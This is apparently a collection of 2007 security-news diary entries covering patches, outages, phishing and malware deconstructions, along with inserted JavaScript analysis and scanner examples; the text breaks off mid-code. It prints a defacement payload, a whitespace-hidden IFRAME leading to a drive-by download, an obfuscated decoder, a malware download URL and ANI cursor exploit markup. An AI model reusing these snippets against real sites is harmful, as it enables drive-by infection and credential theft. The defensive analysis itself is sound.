Trillian Update
The folks over at iDefense have discovered multiple vulnerabilities in Trillian, described as follows:
"Remote exploitation of multiple vulnerabilities in the Internet Relay Chat (IRC) module of Cerulean Studios' Trillian could allow for the interception of private conversations or execution of code as the currently logged on user.
When handling long CTCP PING messages containing UTF-8 characters, it is possible to cause the Trillian IRC client to return a malformed response to the server. This malformed response is truncated and is missing the terminating newline character. This could allow the next line sent to the server to be improperly sent to an attacker.
When a user highlights a URL in an IRC message window Trillian copies the data to an internal buffer. If the URL contains a long string of UTF-8 characters, it is possible to overflow a heap based buffer corrupting memory in a way that could allow for code execution.
A heap overflow can be triggered remotely when the Trillian IRC module receives a message that contains a font face HTML tag with the face attribute set to a long UTF-8 string." -- iDefense's website.
If you are running Trillian 3.1 or earlier, it is time to upgrade to 3.1.5.0.
Joel Esler
http://handlers.sans.org/jesler
BIND Version 9.4.1 is out
If you are running BIND 9.4.0, you should upgrade as soon as possible to BIND 9.4.1.
BIND 9.4.1 can be downloaded from:
ftp://ftp.isc.org/isc/bind9/9.4.1/bind-9.4.1.tar.gz
A binary installer for Windows is still being worked on. It will be made available as soon as it's ready.
Happy updating!
Joel Esler
http://handlers.sans.org/jesler
Buffer Overflows In Adobe Products
The PNG exploit affects:
-Photoshop CS2
-Photoshop CS3
-Photoshop Elements 5.0
-Corel Paint Shop Pro 11.20
And the Bitmap exploit affects:
-Photoshop CS2
-Photoshop CS3
The mitigation for these, basically, is not to open untrusted .png, .bmp, .dib, or .rle files. The possibility of remote shells and command execution does exist, so be cautious. I am sure there will be more to come.
Joel Esler
http://handlers.sans.org/jesler
Verizon having network issues in the midwest
The current estimate is 4-5 hours.
Please do not be alarmed if your connectivity to sites is affected, this is why. The Internet is not melting. (Well, today at least)
Joel Esler
http://handlers.sans.org/jesler
Microsoft web site compromise and partner security
There’s been a lot of discussion over the last few hours regarding a Microsoft website that apparently got defaced. While the domain name has been taken offline, the defacement itself was rather obvious. Users browsing the page were shown a typical “0wn3d by” message with a picture taken of Bill Gates during what was probably his least pleasant visit to Belgium in 1998.
The affected site displayed a remotely hosted image and the attacker’s nickname:
<body onload="document.body.innerHTML='<p align=center><font size=7>Own3d by Cyber-Terrorist</font><img src=http://c2000.com/gifs!/billgates.jpg><p align=center><font size=7>--Cyb3rT--</font></p>';"><noscript>
The affected site was a subpage of ieak.microsoft.com where users could select a distribution license for the Internet Explorer Administration Kit. The server isn’t, however, located on the Microsoft network, but at a hosting partner. In addition, the source of the page mentions another third party as being responsible for the site’s development.
While the brand impact of a low-level compromise like this is negligible, it does bring up some hard questions. In this day and age of increasingly popular outsourcing and co-sourcing, how do you ensure your partners are able to meet your security requirements? Reputation is a good starting point, while supplier audits and compliance with relevant security standards can complete the picture. Both should be part of any outsourcing RFP.
After all, while this may be a small time issue, web site defacements have in the recent past often involved malicious code distribution. Being unavailable and looking a bit silly is one thing to reflect on a brand. Being involved in the distribution of a banking fraud trojan quite another.
--
Maarten Van Horenbeeck
NIST publishes guidance on RFID
Last Friday, the US National Institute of Standards and Technology (NIST) published guidance on how to securely use RFID technology. SP 800-98 explains RFID technology, places it in context, reviews the risks involved with each of its uses and suggests mitigating controls.
It considers business process, business intelligence and privacy risk, in addition to 'external risks' such as those involved with electromagnetic radiation. The document, at 150 pages, is very detailed, and a timely release given the wide variety of potential uses for which RFID technology is now being considered.
Lessons Learned from MS07-017
Lessons learned, or follow-up, is the last step in incident response. It also happens to be the most neglected step.
Hopefully, the MS07-017 patch has been safely deployed through most of your environment by now. I know not everyone has done so yet, and I feel your pain. For those who have, take a few moments to reflect on the event and recall how your environment performed in the early, pre-patch stages and how smoothly the transition to a post-patch state went.
- Did you have compromises?
- Did your AV detect the attacks with generic malicious-ANI or MS05-053 signatures?
- Did your IDS detect the attacks with existing signatures?
- Were you able to protect your unpatched users with content filtering?
Once you have gathered some of the data from the overall event, ask yourself:
- “How could this have gone better?”
- “Are there reasonable changes we could have made to the environment or policy to avoid impact?”
- “Were the losses acceptable?”
At the day-job we needed to tighten the detection and analysis cycle for all of the new malware that was using this vector to get into our network. This means that I’ll probably have an easier time justifying that Sandnet (http://www.lurhq.com/truman/) we’ve been planning to build. We also need to look at the amount of time it takes to block malicious URLs in our response process. We also may want to consider a different content-filtering solution.
The National Weather Service has issued...
Let's not focus on your work DRP, but rather on your home one. Wait, everyone has one, right? Ok, no one throw anything, but yes, we all need one for home. If you don't believe me, just ask the folks in Texas/Mexico who got hammered by the latest tornado, or anyone who has suffered a natural disaster. For me, my work is mostly done from my home office, and that is becoming more common. Not to mention that everything related to our personal lives is becoming automated as well. When was the last time you sat down and manually wrote out anything that you wanted to keep? How lost would you be if your home computer(s) were destroyed right now, without warning? We all need to approach our preparedness at home in a similar fashion to our DRP at work.
Ask yourself where your backups for your computer are sitting, if you have them. If they are sitting next to your computer and your house gets destroyed, they won't help you much. Fellow handler Daniel Wesemann offered a good suggestion: the next time you head out to grandma and grandpa's, or to a friend's or relative's house that is a couple of hours away, take a copy of your most recent backup and ask them to hang onto it for you.
Your backups, as well as critical personal documents, can be stored in a fireproof safe at your home for some extra protection as well. My sister and her husband actually do a really good job of this, but take it a step farther. They live in a very tornado-prone area of the US, so they keep all their original documents (birth certificates, marriage license, vehicle title, etc.) in a safety deposit box and only maintain certified copies of the originals at their house. They also maintain an electronic record of the brand, model and serial numbers of high value items, as well as photos of all high value items. Don't limit yourself to electronic items; also consider photos of things such as antiques, paintings, etc. By doing it this way, they can back it up onto a CD and store the latest copy in the safety deposit box as well. They have everything documented for accounts, policies, etc. in case of an emergency.
Hopefully, no one ever has to use their home DRP, but if the worst happens, you'll be thankful that you had one. If you have anything that you do for your home DRP that you would like to share, then please drop us an email and we'll pass it along!
Apple QuickTime Java Handling Unspecified Code Execution
Secunia has posted an advisory today concerning Apple QuickTime's Java handling. According to the advisory this is a highly critical problem that affects versions 3.x, 4.x, 5.x, 6.x and 7.x. The vulnerability is due to an unspecified error within the Java handling in QuickTime, and can be exploited to execute arbitrary code when a user visits a malicious web site using a Java-enabled browser, e.g. Safari or Firefox.
For more information see:
secunia.com/advisories/25011/
Microsoft Office Exploit
In a quote from the article, our own Alan Paller of the SANS Institute says:
“Assaults are coming from China and perhaps other countries in the hunt for military, trade and infrastructure intelligence, says Alan Paller, research director at The SANS Institute, a security think tank. The goal: strategic advantage over the USA. "The attacks are working," says Paller. "Penetrations are deep and broad."
For more information and to read the article:
www.usatoday.com/tech/news/computersecurity/2007-04-22-cyberspies-microsoft-office_N.htm
New Challenge: Microsoft Office Space - A SQL With Flair
By the way, did you get the memo detailing the requirement for adding cover sheets to your TPS reports?
Follow the Bouncing Malware: Day of the Jackal
The real problem was that his typing skills just weren't very good. Oh sure, he could type... but he wasn't very fast, or for that matter, very accurate. It had taken him almost two hours to type out his reply to his cousin Joe in America, and even then, looking back over the message, it was filled with typing errors.
He chuckled silently to himself, reminded of an old joke: it didn't matter that he couldn't type very quickly... his cousin, Joe Sixpack, couldn't read very fast either.
Their trans-Atlantic correspondence had transitioned from the days of light-blue onionskin paper and envelopes marked “LUFTPOST/PAR AVION” into the electronic era somewhat seamlessly. He and Joe had been writing back and forth for almost twenty years now-- since both of them were in school. Joe's initial letter had arrived out of the blue-- a message from a cousin he didn't even know he had, living a different life, in a different country. They struck up a friendship and had continued to write back and forth over the years-- they seemed to have so many things in common: they each had a rather boring middle-management job, were married, had two children and were... well... both perfectly “average.” They had each gone out and purchased a computer a few years back as a family Christmas present, and had taken to communicating with each other by email. They had learned about this new technology together, swapping tips and tricks. Joe seemed to know so much about computers... he had explained in long, involved messages exactly how the Internet worked and somehow he managed to find the most amazing things out there on the 'net. He always sent Otte links to funny jokes, online games, and websites that had pictures guaranteed to make even the most worldly person blush. Otte had stored those emails away in a special folder, and even though it was late, he considered doing a little “recreational surfing” before turning in. He had heard that pornographic websites could infect your computer with some kind of virus or disease, but Joe had explained that it was all just a myth made up by left-wing feminists who wanted to keep men from looking at beautiful, naked women. Joe was always so “up” on popular culture and politics.
Otte clicked the “Send” button in his email program and imagined his message to Joe shooting through the long series of tubes that made up the Internet and appearing in Joe's in-box on the other side of the ocean. It was an amazing thing, and he always felt so “high-tech” when he sent email.
It was late, and as inviting as the thought of visiting one of Joe's “special” sites was, he decided that he should shut the machine down and head to bed. Just as he was about to turn the machine off, he heard a stupidly chipper voice announce, “Email für dich!” (“Email for you!”).
Not only did Joe read slowly, but he also typed about as fast and as well as Otte, so it couldn't be a response so soon. Otte looked at his in-box and saw a new message:
Sender: Web-Nachrichten Deutschlands [info@focus.de]
Subject: In Muenchen ist Trauer angekuendigt (“In Munich, mourning is announced”)
Otte was concerned. He clicked on the email and read the following:
Innerhalb von einer Stunde beging ein Asiater 6 brutale Morde und verschwand in der unbestimmten Richtung. Der Moerder schlich sich in ein Wohnhaus ein und schlachtete all seine Bewohner inklusive 2 kleiner zehnjaehrigen Maedchen, die heimgegangen sind. Ermordet waren auch alle Haustiere. Die Polizei ist schockiert und macht nun alles Moegliche, um diesen Taeter so schnell wie moeglich finden zu koennen. Dank einiger Passanten gibt es nun eine kurze Beschreibung des Verbrechers. Es wurde eine Belohnung angekuendigt, wenn jemand etwas zu diesem Fall mitteilen kann. Naeheres dazu sowie ein Roboterbild unter http://tanknk.dothome.co.kr
(“Within an hour a Asian national committed 6 brutal murders and vanished in an unknown direction. The murderer sneaked into an apartment house and slaughtered all of the inhabitants including two small 10 year old girls, which went home. Slaughtered also were all pets. Police is shocked and now does all possible to find the culprit as soon as possible. Because of some passerby a short description of the culprit is available. There is an reward announced for hints to the case. Details and also a robot image under...”)
“What is the world coming to?” thought Otte as he re-read the message. Only last week he had read, in horror, the story of a mass killing in Virginia in the United States, and now this, right here in Germany. He had followed the details of the earlier story closely, and the parallels with this new tragedy were startling. He needed to know more, but before he clicked on the link, he wrote up a quick translation of the email and sent it off to his cousin... he just knew Joe would be as interested as he was.
Welcome to the Jungle
(OK... Once again, I find myself in the rather unenviable position of having to warn those of you whose brain waves fall a little short of the beach not to shoot yourselves in the foot. So... if you find that people are always questioning the number of angels that could dance on your head: DO NOT GO TO ANY OF THE SITES I MENTIONED IN THIS LITTLE MALWARE DECONSTRUCTION. JUST DON'T.)
Otte was going to be a bit disappointed... The link in that email wasn't going to take him to a story about a tragic mass murder in Munich, but instead to a rather uninteresting page in which free accounts at “dothome.co.kr” are described in Korean. But, buried deep within the page we find a little gift that someone placed within the HTML:
<iframe style='visibility: hidden;'width='1' height='1' src='http://203.223.158.26/africaonline/2/'>
</iframe>
Note: They hid it waaaaaay off to the right by putting a whole mess of spaces in front of it, 'cause of course no one would ever look over there. You malware dudes crack me up... I can just see 'em... eight or nine guys all sitting around some big wooden table in their Secret Underground Malware Fortress of Doom:
Malware Dude #1: Okay... so we're agreed. We'll put the link to a hidden IFRAME within an otherwise innocuous page.
Malware Dude #2: But wait! What if someone looks at the source code to that page! Won't they be able to see the HTML code that creates the hidden IFRAME?
Malware Dude #1: Drat! Our entire plan is foiled! Curse that “View Page Source” menu item! Now we'll all have to go back to our previous careers, writing high performance Visual Basic apps!
A murmur of discontent courses through the room. There is talk of suicide. Someone mentions storming Redmond and demanding that the offending “View Page Source” option be removed from IE. Then, suddenly, in a shadowy back corner, a PFY stands up, clears his throat, and, in a squeaky voice, says:
Malware PFY: Perhaps we could put a whole bunch of SPACES in front of the IFRAME code. That way it would be pushed over to the right hand side and out of sight.
Malware Dude #1: Gasp! Why... why.... that is absolutely brilliant!
Malware Dude #2: Amazing! You sir, are a freakin' genius!
A chorus of cheers and shouts fills the room. High-fives are made. Toasts to the audacity of youth fill the air. A large container filled with Gatorade is inexplicably found sitting in another corner and is promptly dumped over the PFY's head.
And there is much rejoicing.
But, I digress...
The cleverly hidden IFRAME points to a webpage within a subdirectory on a different site that is driven by some PHP code. The PHP code is designed in such a way as to exclude anyone from the fun who visits the site with anything other than IE. You see, the PHP code checks the browser identification (User-Agent) header of every request coming in, and serves up fun and interesting malware only to those who browse with IE.
Since, of course, I couldn't visit the site with IE without risking possible infection, it was impossible for me to retrieve any of the code.
Hehehehehe.....
Sometimes I crack myself up.
After blatantly lying to PHP, we retrieve the following:
<script language=JavaScript>
function makemelaugh(x){
var l=x.length,b=1024,i,j,r,p=0,s=0,w=0;
t=Array(63,42,36,33...[EDITED]...4,11,0,23);
for(j=Math.ceil(l/b);j>0;j--){
r='';
for(i=Math.min(l,b);i>0;i--,l--){
w|=(t[x.charCodeAt(p++)-48])<<s;
if(s){
r+=String.fromCharCode(170^w&255);
w>>=8;
s-=2
}else{s=6}
}document.write(r)
}
}
makemelaugh("LuLa_qN5Vvc...[EDITED]...@jWEl")
</script>
(Note: I cleaned it up a whole lot, and edited it as indicated.)
Ok... Some things of interest here:
First off, someone is obviously trying to hide something from us here. The stuff that I edited at the second spot above (the parameter being passed to the makemelaugh() function) was actually several pages of gibberish. That gibberish will get turned back into code that actually does something by the makemelaugh() function.
The second thing I noticed is that although the text of the email is in German (well... sort of... my sources tell me it's pretty crappy German), the function name here is in English: makemelaugh(). Well, LaughingBoy... let's see what you're up to.
There are SO many ways that we could pull this sucker apart. Trust me... this thing is truly the JavaScript equivalent of shoving spaces in front of IFRAME references. It'll take all of about 30 seconds of editing to make this script tell us everything it knows. When are you malware writin' guys going to learn? Obfuscating code in an interpreted language hides about as much as Paris Hilton's underwear.
In any case, shoving some well placed <textarea></textarea> statements into this code and allowing IE to take a crack at it (on an instance of VMware... really, would you expect less?) we end up with an unobfuscated script that my AV tags as “VBS/TrojanDownloader.Small.DO”:
(Note: I tried including the script here in a draft of this piece, but it kept setting off AV alerts unless I edited it down to nothing... that's what happens when the kidz end up copying from each other... so you'll just have to make do with a description...)
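To see what the decoder above actually does without handing the payload to IE, here is an added example (my own code, not the script from the page and not anything the malware author wrote): a stand-alone port of the makemelaugh() loop that accumulates the decoded text into a string instead of calling document.write(), plus the inverse encoder so the round trip can be checked, and a grep-style pass over the result. The real substitution table t[] and the real payload were edited out of the page, so TABLE and the sample payload below are constructed for illustration; the charCode - 48 indexing, the 6-bit packing and the 170 (0xAA) XOR are taken from the script as shown.

```javascript
// Added example: a harmless re-implementation of the makemelaugh() decoder.
// The malware's real t[] table and payload are not reproduced; TABLE is an
// assumed 64-entry permutation and the payload below is constructed.

// makemelaugh() indexes t[] with charCode - 48, so the alphabet is ASCII 48..111.
// Any bijection onto 0..63 will do; 37 is odd, hence coprime with 64 (assumed table).
const TABLE = Array.from({ length: 64 }, (_, i) => (i * 37 + 11) % 64);
const XOR_KEY = 170; // 0xAA, straight from the original script

// Faithful port of the decode loop, minus the 1024-char document.write() chunking
// (the chunking only changes how output is emitted, not what is decoded).
function decodeLikeMakemelaugh(x, t = TABLE, xorKey = XOR_KEY) {
  let out = "";
  let w = 0, s = 0, p = 0;
  for (let i = x.length; i > 0; i--) {
    // each input char contributes one 6-bit symbol, packed little-endian into w
    w |= t[x.charCodeAt(p++) - 48] << s;
    if (s) {
      out += String.fromCharCode(xorKey ^ (w & 255)); // same precedence as 170^w&255
      w >>= 8;
      s -= 2;
    } else {
      s = 6;
    }
  }
  return out;
}

// Inverse of the above: XOR each byte, emit 6-bit symbols LSB-first, map through t^-1.
function encodeLikeMakemelaugh(plain, t = TABLE, xorKey = XOR_KEY) {
  const inv = new Array(64);
  for (let i = 0; i < 64; i++) inv[t[i]] = String.fromCharCode(48 + i);
  let acc = 0, nbits = 0, out = "";
  for (const ch of plain) {
    acc |= ((ch.charCodeAt(0) ^ xorKey) & 255) << nbits;
    nbits += 8;
    while (nbits >= 6) {
      out += inv[acc & 63];
      acc >>= 6;
      nbits -= 6;
    }
  }
  if (nbits > 0) out += inv[acc & 63]; // trailing bits, zero-padded
  return out;
}

// Cheap triage of whatever falls out: strings an analyst would grep for first.
const MARKERS = ["<script", "document.write", "ActiveXObject", "Shell.Application", ".exe", "Msxml2.XMLHTTP"];
function suspiciousMarkers(decoded) {
  const lower = decoded.toLowerCase();
  return MARKERS.filter((m) => lower.includes(m.toLowerCase()));
}

// Constructed payload standing in for the edited-out "LuLa_qN5Vvc..." string.
const SAMPLE_PLAIN = "<script>var o=new ActiveXObject('Msxml2.XMLHTTP');document.write('x');</script>";
const SAMPLE_ENCODED = encodeLikeMakemelaugh(SAMPLE_PLAIN);

if (typeof require !== "undefined" && require.main === module) {
  const decoded = decodeLikeMakemelaugh(SAMPLE_ENCODED);
  console.log("encoded :", SAMPLE_ENCODED);
  console.log("decoded :", decoded);
  console.log("markers :", suspiciousMarkers(decoded));
}
```

The point of the port is the substitution in the first line of the inner loop: the only thing that differs between this and the live script is that the live one ends in document.write(r), which is exactly the call the textarea trick neutralises. With the real t[] pasted in place of TABLE and the real argument in place of SAMPLE_ENCODED, decodeLikeMakemelaugh() returns the second-stage script as a string.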
The downloaded script attempts to use the issue patched by Microsoft as MS06-014 “Vulnerability in the Microsoft Data Access Components (MDAC) Function Could Allow Code Execution (911562)” It looks to me like the script might have been based off of exploit code published as part of the Metasploit framework (no shot at HD intended... that's just what it looks like...). In this case, the vulnerability does indeed allow for code execution, and the code that gets executed is downloaded from:
http://203.223.158.26/africaonline/2/get.php?file=exe
Again, this is another PHP script that won't give anything up to a non-IE browser. But, after doing a bit more creative lying, we're graced with a download of 102,400 bytes of packed Delphi dropper goodness called “update.exe.” When executed, this drops a file called ipv6monl.dll into the windows\system32 directory and installs it by setting it up to operate as our old friend, a Browser Helper Object (BHO). Update.exe also adds several entries under:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\load
which appear to hold some sort of configuration data. Also, in order to make sure that its nefarious communication will be allowed out of your machine, it diddles with some registry entries to make sure that IE has unfettered access through the Windows firewall. Oh... and if you happened to have turned off the use of BHOs in IE, it helpfully turns them back on. How nice...
What does LaughingBoy's BHO do? Well, from its vantage point deep inside the bowels of IE (boy... there's an icky metaphor), it captures various information about your computer and any user accounts, grabs any locally cached passwords as well as IE's autocomplete information and any passwords used by Outlook or Hotmail. Oh... and if you happen to use any one of several European banks, logging into your account on a compromised machine will result in your username and password being sent off to the bad guys.
Nice, really nice.
And let's not forget that this stellar example of human ingenuity started the whole sordid mess off by exploiting a recent tragedy.
How's this for a business model:
1)Wait for tragedy to strike
2)Send mail exploiting general fear and interest in said tragedy
3)Wait for easily duped people to click on your link
4)$Profit$
LaughingBoy: You have my vote for Scumbag of the Year. Me and 35 other Handlers would like to meet you (preferably in a dark alley) so we can present you with your “award”...
Oh... BTW, LaughingBoy... 'Leet h4xor d00dz don't use MidnightCommander... if you need to install mc when you 0wn a box, you pro'lly need to do a little remedial work on your 'nix command line foo...
-------------------------------------------------------------------------------
Tom Liston - Handler on Duty
Intelguardians
P.S.: Thanks to Josef for translating. Note: The translation isn't poorly done. Josef attempted to mimic the style of the original, poorly-written German. Also, thanks to the inimitable Dr. J. for putting up with my German translation questions...
Jackals...
How do you people live with yourselves? How do you introduce yourselves to others? ("Hello, I make my living exploiting human tragedy.") Are you proud of what you do? At the end of the day, do you have some sense of accomplishment? Do you tell your children what you do? Your spouse? Your parents? There are so many horrible, tragic things in this world already... how can it be that the best response that you can come up with in the face of suffering is to try to turn someone else's loss into your gain?
Sometimes, I'm ashamed that I'm part of this species...
Safari 0day? Looks like...
-----------------------------------------------------------------------------------------
Handler on Duty: Pedro Bueno ( pbueno //&&// isc. sans. org)
Trojan posing as Codecs
http :// free-bdsm-movies. info/movies/1270174.avi
(Resolves to 85.255.119.210)
However, clicking on the link will open to another site in an iFrame:
http : //www. x-ratedclips.com/bdsm/dp/s5g2/movie1.php?bgcolor=000000&border=3C4553&id=1651
(Resolves to 81.0.250.226)
The x-ratedclips.com page has HTML code that checks for the presence of a Trojan (Zlob.Trojan). If it is not found, it will display a page to tell the viewer that the movie cannot be played and to download a "missing Video ActiveX Object".
The "activex object" link is
http: // www. amultimediasource.com/download.php?id=1651
(Resolves to 85.255.113.222)
Note: 85.255.112.0/20 (85.255.112.0 - 85.255.127.255) is a known source of evil (http://isc.sans.org/diary.html?storyid=1811)
Not surprisingly, the downloaded file is actually a Trojan. Positive scan results from VirusTotal:
AntiVir 7.3.1.53 04.20.2007 DR/Zlob.Gen
AVG 7.5.0.464 04.20.2007 Downloader.Zlob.GG
BitDefender 7.2 04.21.2007 Trojan.Downloader.Zlob.RX
eSafe 7.0.15.0 04.19.2007 suspicious Trojan/Worm
Fortinet 2.85.0.0 04.21.2007 W32/Zlob.BRI!tr.dldr
Ikarus T3.1.1.5 04.20.2007 Trojan-Downloader.Win32.Zlob.bpg
Kaspersky 4.0.2.24 04.21.2007 Trojan-Downloader.Win32.Zlob.bqt
McAfee 5014 04.20.2007 New Malware.as
Sophos 4.16.0 04.20.2007 Troj/Zlob-Gen
TheHacker 6.1.6.095 04.15.2007 Trojan/Downloader.Zlob.bpl
Webwasher-Gateway 6.0.1 04.21.2007 Trojan.Zlob.Gen
New MS KB article (deploy DNS remote RPC block workaround)
The KB article is located at
http://support.microsoft.com/kb/936263
MSRC Blog
(Thanks to Juha-Matti for sharing too)
port 443 / https increase
If you see attacks against https servers, please let us know and send in packets (including any web server logs if they would show an effect of the attack).
Try to limit packet submissions to "suspect" packets that either cause suspect server behaviour or trigger an IDS.
isc.sans.org/port.html
IRA Tax Glitch
So the issue with some banks and mutual fund companies is that customers using their web interfaces on Tuesday for IRA contributions were allowed to select 2006 as the year for which a deposit was credited. However, the back-end systems were programmed to only allow 2007 contributions after midnight the night before. So, if you made a 2006 contribution on Tuesday via a web portal or other online service, you should check to make sure that you were accurately credited for 2006 and that your contribution did not get recorded for 2007.
The next time this happens will be in April of 2012. Let's see if the computers get the word.
Marcus H. Sachs
Director, SANS Internet Storm Center
Malware Soup du Jour
In other cases, though, things sometimes are what they appear to be. While today investigating a malware sample coming from 81.29.241.231, I noticed that in the past month we had analyzed almost a dozen samples coming from the same 81.29.241.0/24 address range. Good enough an indication for me that putting this address range "off limits" for my systems is time well invested. The address range is located in Moscow, Russia, so unless your users are located there or do a lot of business with Moscow, chances are small that blocking the entire address range will have side effects.
Apple Security Announcement 2007-004
The updates can be applied via the Software Update icon in the Apple menu, or by downloading and installing the appropriate update from the Apple Support Downloads site.
---
Scott Fendley
ISC Handler
We need your help: VA Tech Domains
We set up a page with about 450 different domain names that look suspect. If you have a few minutes, help us to categorize the domains. You need to log in (so we can prevent bad input).
For details, see http://isc.sans.org/domaincheck.html .
Thunderbird 2.0.0.0 released
www.mozilla.org/news.html
As well, Firefox 1.5.x will only be supported with security and stability updates until April 24, 2007. Time to upgrade.
www.mozilla.com/en-US/firefox/all.html
Thanks to Paul and Kevin for writing in.
Cheers,
Adrien
Oracle CPU
www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2007.html
Cheers,
Adrien de Beaupre
Blackberry Outage
and just as I posted this (8am EDT), my own T-Mobile Blackberry started to wake up and deliver email again.
Update:
RIM have acknowledged the incident, things appear operational now. Some mail delayed earlier may still be arriving now.
Phishers taking advantage of Virginia Tech tragedy
There has been a flurry of domain registrations related to the Virginia Tech tragedy, as reported by GoDaddy and other registrars. While some of these are undoubtedly well-intentioned organizations joining in the outpouring of support for the friends and family of the victims, others are likely to be opportunists who want to cash in on the suffering of others.
Be on the lookout for a rash of spam and phishing coming from these leeches. If you receive a plea for donations, check the organization out closely before opening up your e-gold, PayPal, Visa or other account or providing any personal information. In some cases the phishers may use voice, fax, email and websites to dupe generous and thoughtful victims into disclosing valuable information.
With any luck, these have been scooped up by cybersquatters (http://www.sans.org/newsletters/newsbites/newsbites.php?vol=9&issue=22#sID301) who will be left holding the bag when nobody is heartless enough to use the domains for unscrupulous purposes. A number of the following domains have been checked and, as of yet, contain no content:
vatechshooting.com
vatechshooting.net
vatechshooting.org
vatechshooting.info
vatechshooting.us
vatechshooting.biz
vtshooting.com
vtshooting.info
vatechmassacre.com
vatechmassacre.net
vatechmassacre.info
vatechmassacre.biz
vtmassacre.com
vtmassacre.net
vtmassacre.org
vtmassacre.info
virginiatechrampage.com
vatechrampage.com
vtrampage.com
virginiatechmurders.com
virginiatechmurders.net
virginiatechmurders.org
virginiatechmurders.info
virginiatechmurders.us
vatechmurders.com
vtmurders.com
hokieshootings.com
hokiemassacre.com
Here is a blog listing the above GoDaddy domains, and linking to other related blogs:
http://blog.wired.com/27bstroke6/2007/04/godaddy_registe.html#more
New variant of ANI (MS07-017) exploit
What a shocker - malware authors are playing cat 'n' mouse with antivirus signatures.
Roger Chiu of Malware-Test Lab submitted a .ani file observed in the wild that was not detected as malicious by any popular antivirus tools. As with many other ANI attacks, this was presented as a CURSOR object in a DIV element on a compromised web site:
<DIV style="CURSOR: url(hxxp://xxx.xxx.xxx.xxx/mcs2001/chat/css.js)"></DIV>
<DIV style="CURSOR: url(hxxp://xxx.xxx.xxx/customer/image/css.js)"></DIV>
This latest variant was submitted to the A/V community for inclusion, and the site owners have been contacted.
Thanks, Roger.
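Both vectors on this page, the whitespace-hidden IFRAME in the "Follow the Bouncing Malware" deconstruction above and the CURSOR: url() DIVs in this entry, are simple enough to triage with a few regular expressions. The scanner below is an added example (my code, not anything from the diaries or from the submitters): it flags IFRAMEs that are hidden by style, one pixel in size, or pushed off-screen by a long run of leading spaces; flags cursor URLs whose extension is not .cur or .ani; and, because the file name means nothing (the samples above were served as css.js), checks fetched bytes for the RIFF/ACON header an animated cursor really carries. The HTML and byte samples are constructed, using TEST-NET addresses.

```javascript
// Added example: regex-based triage for hidden IFRAMEs and CSS cursor hooks.
// Not a parser; good enough for a first pass over a suspicious page. All
// sample markup and bytes below are constructed (TEST-NET addresses).

const IFRAME_RE = /<iframe\b([^>]*)>/gi;
const CURSOR_RE = /cursor\s*:\s*url\(\s*['"]?([^'")\s]+)['"]?\s*\)/gi;

// Pull one attribute value out of a raw attribute string (a='1' b=2 c="3").
function attr(attrs, name) {
  const re = new RegExp("\\b" + name + "\\s*=\\s*(?:\"([^\"]*)\"|'([^']*)'|([^\\s>]+))", "i");
  const m = re.exec(attrs);
  return m ? (m[1] ?? m[2] ?? m[3]) : null;
}

function scanHtml(html) {
  const findings = [];

  for (const m of html.matchAll(IFRAME_RE)) {
    const attrs = m[1];
    const style = (attr(attrs, "style") || "").toLowerCase();
    const w = parseInt(attr(attrs, "width") || "", 10);
    const h = parseInt(attr(attrs, "height") || "", 10);
    const reasons = [];
    if (/visibility\s*:\s*hidden|display\s*:\s*none/.test(style)) reasons.push("hidden via style");
    if ((!Number.isNaN(w) && w <= 1) || (!Number.isNaN(h) && h <= 1)) reasons.push("1-pixel frame");
    // The "shove it off to the right" trick: a long run of whitespace between
    // the start of the line and the tag.
    const lineStart = html.lastIndexOf("\n", m.index) + 1;
    const lead = html.slice(lineStart, m.index);
    if (lead.length >= 40 && /^\s+$/.test(lead)) reasons.push(lead.length + " leading spaces");
    if (reasons.length) findings.push({ type: "iframe", src: attr(attrs, "src"), reasons });
  }

  for (const m of html.matchAll(CURSOR_RE)) {
    const url = m[1];
    if (!/\.(cur|ani)(\?|$)/i.test(url)) {
      findings.push({ type: "cursor", src: url, reasons: ["cursor url() without .cur/.ani extension"] });
    }
  }
  return findings;
}

// An animated cursor is a RIFF container with form type "ACON"; check the bytes,
// not the extension. Feed this whatever the cursor URL actually returned.
function isAniFile(bytes) {
  if (bytes.length < 12) return false;
  const tag = (off) => String.fromCharCode(bytes[off], bytes[off + 1], bytes[off + 2], bytes[off + 3]);
  return tag(0) === "RIFF" && tag(8) === "ACON";
}

// Constructed sample page mixing benign and suspicious elements.
const SAMPLE_HTML = [
  "<html><body>",
  "<p>Free hosting accounts, sign up today.</p>",
  '<iframe src="http://192.0.2.5/ads/banner.html" width="468" height="60"></iframe>',
  " ".repeat(200) + "<iframe style='visibility: hidden;'width='1' height='1' src='http://192.0.2.10/africaonline/2/'></iframe>",
  '<DIV style="CURSOR: url(http://192.0.2.20/mcs2001/chat/css.js)"></DIV>',
  '<div style="cursor: url(/static/hand.cur), auto"></div>',
  '<DIV style="CURSOR: url(http://192.0.2.21/customer/image/css.js)"></DIV>',
  "</body></html>",
].join("\n");

// Constructed bytes: a minimal RIFF/ACON header versus a JavaScript file.
const SAMPLE_ANI_BYTES = new Uint8Array([0x52, 0x49, 0x46, 0x46, 0x10, 0x00, 0x00, 0x00, 0x41, 0x43, 0x4f, 0x4e, 0x61, 0x6e, 0x69, 0x68]);
const SAMPLE_JS_BYTES = new TextEncoder().encode("var a = 1; // css.js");

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(scanHtml(SAMPLE_HTML), null, 2));
  console.log("ani header:", isAniFile(SAMPLE_ANI_BYTES), isAniFile(SAMPLE_JS_BYTES));
}
```

Two caveats worth keeping in mind: the extension check is only a hint (a malicious cursor can perfectly well be called something.ani, which is why isAniFile() looks at the bytes), and regexes will miss markup assembled at runtime, so run the scanner over what the browser ends up with (a saved DOM) as well as over the raw HTML.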
New DShield Feature: Highly Predictive Blocklists.
The short one paragraph summary: The algorithm compares your submissions to others and finds groups of similar submitters. Next, it will generate blocklists based on how close you are to these other submitters.
In other simulations, these blocklists have been far superior to regular "global worst offender" or "local worst offender" lists.
For details, see http://www.dshield.org/hpbinfo.html
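The one-paragraph summary compresses the idea quite a bit. The toy below is added here as an illustration of the mechanics and is in no way DShield's implementation: it measures how similar each other submitter's attacker list is to yours (Jaccard overlap, an assumed choice of metric), ranks attackers you have not yet seen by the summed similarity of the submitters who did report them, and puts that next to a plain "global worst offender" count so the difference is visible. Submitter names and addresses are constructed from the RFC 5737 documentation ranges.

```javascript
// Added illustration of the "highly predictive blocklist" idea, not DShield's code.
// Submitters and addresses are constructed (RFC 5737 documentation ranges).

const SUBMISSIONS = {
  alice: ["198.51.100.1", "198.51.100.2", "203.0.113.7", "203.0.113.9"],
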